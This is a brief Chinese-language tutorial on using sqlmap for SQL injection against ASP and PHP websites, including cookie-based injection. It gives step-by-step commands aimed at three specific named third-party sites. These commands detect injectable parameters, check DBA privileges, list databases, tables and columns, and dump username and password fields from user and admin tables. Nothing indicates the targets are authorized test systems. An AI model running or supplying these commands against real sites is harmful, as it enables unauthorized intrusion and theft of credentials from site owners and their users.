*教程
http://www.nxadmin.com/tools/1241.html
一、ASP网站
1.
sqlmap -u “http://www.czypjx.com/News_show.asp?id=110”
-u “检测是否存在注入”
返回数据库的名字
查看数据库信息及是否存在注入漏洞(绿色可以注入,黄色不可)
2.
sqlmap -u “http://www.czypjx.com/News_show.asp?id=110” --tables
猜解出所有表名
选择"user" "admin"
3.
sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --columns -T "user"
--columns 猜列名 根据user表
4.
sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --dump -C "username,password" -T "user"
--dump 下载数据 -C “username,password” 列名
二、PHP网站(一般是mysql的数据库)
1. 检测
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”
2.是否dba权限
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --is-dba
3.列出所有数据库
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --dbs
4.查找自己的数据库
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --current-db
5.查询所有表名
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"
查询所有表名, 根据ggec数据库来查询
6.查询所有的列
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --colums -T “ggec_admin” -D "ggec"
“ggec_admin”是选择的表名
7.查询列的字段
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dump -C “username,password” -T “ggec_admin” -D "ggec"
三、ASP网站的Cookie注入
1.
sqlmap -u "http://www.wisefund.com.cn/about.asp?id=56“
显示不能注入
修改为
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --cookie “id=56” --level 2
--cookie “” 这里写ID的参数
有时这样就可以注入了
2.
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --tables --cookie “id=56” --level 2
3.
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --columns -T “user” --cookie “id=56” --level 2
4.
sqlmap -u “http://www.wisefund.com.cn/about.asp ”--dump -C “username,password” -T “user” --cookie “id=56” --level 2
*参考
http://wenku.baidu.com/link?url=2KJ2bgLFI3Fhknk0Pr3fAlMDmLr-jqG6fD9FaBdLqTFbNnHyVLy-NIjpgm5RsBDVoegjVFw1GAqg_QdgqljPUWKcvNyGFLIEVw3aj9ZuYwa
http://drops.wooyun.org/tips/143
http://it.100xuexi.com/view/otdetail/20131031/8158cdfa-e485-46f9-8067-a4ad4891d267.html
http://www.cnblogs.com/hongfei/p/3872156.html